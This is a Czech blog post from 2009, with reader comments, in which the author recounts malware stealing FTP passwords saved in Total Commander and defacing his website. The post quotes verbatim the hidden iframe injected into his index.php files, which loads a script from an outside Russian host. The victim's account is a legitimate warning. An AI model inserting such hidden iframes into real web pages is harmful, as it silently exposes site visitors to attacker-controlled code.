Internetová kriminalita roste a roste

30. 7. 2009 – 9.47

cyber_security1Pozor, šíří se viry, které dokáží vycucnout z TotalCommandera přístupová údaje k ftp účtu a následně změnit vaši www prezentaci!!!

Včera jsem měl zavirovaný počítač a dnes ráno to mělo pokračování v podobě mých nefunkčních www stránek. Naštěstí nefunkčních, protože jinak bych si ničeho nevšiml. Do každého souboru s názvem index.php jsem měl přidán navíc tento cizí kód:
<iframe src=“http://x9y.ru:8080/ts/in.cgi?pepsi120″ width=125 height=125 style=“visibility: hidden“></iframe>

Je to kód, který se na vzhledu a funkčnosti www stránek běžně nijak neprojeví (díky bohu u mě náhodou způsobil chybu skriptu), ale způsobí, že se návštěvníkům zároveň s prohlížením vaší stránky spustí kód nějakého ruského hekerského šmejda pod nickem „pepsi120″. Je „vtipné“, že tento škodlivý kód on může variabilně měnit, podle svých nekalých plánů. Zatím skript nedělal nic, jen zřejmě registroval počet spuštění, to aby mr. „pepsi 120″ věděl, kolik webů už infikoval.

To je tedy průšvih, protože dosud jsem měl zato, že když se člověk vyhýbá „pornu a warezu“, tak je surfování po webu relativně bezpečné. Už není. Tímto mechanismem může být napadena jakákoliv „seriózní“ stránka…

Protože jsou výrobci virů vždy o krůček napřed, obávám se, že ani investice do drahých softwérů není to pravé. Na počítači mi běží Avast, Windows defender a Spyware terminator, a stejně jsem byl infikován při prohlížení běžného webu.  Řešení může být snad investice do něčeho takového jako http://www.sandboxie.com/

Více o nebezpečí ukládání hesel v TC zde:

http://www.dsl.cz/clanky-dsl/clanek-1018/Nebezpecny-Total-Commander

    DŮLEŽITÉ UPOZORNĚNÍ:
  • Komentáře návštěvníky zde zanechané nevyjadřují stanovisko autora tohoto webu, slouží ke svobodnému vyjadřování a výměně názorů lidí, kteří tento web navštíví.
  • Každý, kdo zde zanechá komentář je za jeho obsah v plné míře morálně i trestně zodpovědný.
  • Je zakázáno propagovat rasovou, národnostní, náboženskou či jinou nesnášenlivost či diskriminaci, užívat vulgární jazyk, urážet a pomlouvat, vyhrožovat a zastrašovat násilím, atd. Zkrátka: pište věcně a slušně!
  • Autor webu si vyhrazuje právo mazat jakékoliv příspěvky, které porušují tato pravidla.
  1. 3 Responses to “Internetová kriminalita roste a roste”

  2. Na čem máš ten web puštěnej? Byl jsem svědkem sázky, kdy správce linux serveru nabízel nějaké všimné, když se mu někdo do něj dokáže probourat, tuším, že tam měl i apache. Zatim se nikdo neozval, že by uspěl.
    No, držim palce ;-)

    Vencour

    By Vencour on Čvc 30, 2009

  3. toto napadnutie som mal pred 3 tyzdnami a napadne vecsinou index subory

    By Anonymní on Čvc 30, 2009

  4. Ok a co jste dělali, aby se to neopakovalo, víte, čim prošel? Našli jste exploit etc?

    Vencour

    By Vencour on Srp 4, 2009

Přidat komentář k tomuto článku